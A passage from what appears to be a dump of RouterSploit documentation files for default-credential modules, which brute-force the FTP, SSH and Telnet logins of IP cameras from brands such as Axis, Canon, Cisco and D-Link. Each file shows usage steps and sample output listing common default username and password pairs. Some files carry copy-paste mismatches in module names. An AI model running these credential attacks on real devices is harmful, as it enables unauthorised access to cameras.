'12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/avtech/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Avtech Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/avtech/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/avtech/telnet_default_creds\nrsf (Avtech Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Avtech Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/axis/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Axis Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/axis/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/axis/ftp_default_creds\nrsf (Axis Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Axis Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/axis/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Axis Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/axis/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/axis/ssh_default_creds\nrsf (Axis Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Axis Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/axis/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Axis Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/axis/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/axis/telnet_default_creds\nrsf (Axis Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Axis Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/basler/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Basler Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/basler/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/basler/ftp_default_creds\nrsf (Basler Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Basler Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/basler/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Basler Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/basler/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/brickcom/ssh_default_creds\nrsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Brickcom Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/basler/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Basler Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/basler/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/dlink/telnet_default_creds\nrsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/brickcom/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Brickcom Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/brickcom/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/brickcom/ftp_default_creds\nrsf (Brickcom Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Brickcom Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/brickcom/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Brickcom Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/brickcom/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/brickcom/ssh_default_creds\nrsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Brickcom Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/brickcom/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Brickcom Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/brickcom/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/brickcom/telnet_default_creds\nrsf (Brickcom Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Brickcom Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/canon/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Canon Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/canon/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/canon/ftp_default_creds\nrsf (Canon Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Canon Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/canon/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Canon Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/canon/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/canon/ssh_default_creds\nrsf (Canon Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Canon Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/canon/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Canon Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/canon/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/canon/telnet_default_creds\nrsf (Canon Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Canon Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/cisco/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Cisco Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/cisco/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/cisco/ftp_default_creds\nrsf (Cisco Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Cisco Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/cisco/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Cisco Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/cisco/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/cisco/ssh_default_creds\nrsf (Cisco Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Cisco Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/cisco/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Cisco Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/cisco/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/cisco/telnet_default_creds\nrsf (Cisco Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Cisco Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/dlink/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against D-Link Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/dlink/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/dlink/ftp_default_creds\nrsf (D-Link Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/dlink/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against D-Link Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/dlink/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/dlink/ssh_default_creds\nrsf (D-Link Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/dlink/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against D-Link Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/dlink/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/dlink/telnet_default_creds\nrsf (D-Link Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/geovision/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against GeoVision Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/geovision/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/geovision/ftp_default_creds\nrsf (GeoVision Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (GeoVision Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/geovision/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against GeoVision Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/geovision/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/geovision/ssh_default_creds\nrsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (GeoVision Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/geovision/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against GeoVision Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/geovision/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/geovision/telnet_default_creds\nrsf (GeoVision Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (GeoVision Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/grandstream/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Grandstream Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/grandstream/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/grandstream/ftp_default_creds\nrsf (Grandstream Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Grandstream Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/grandstream/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Grandstream Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification 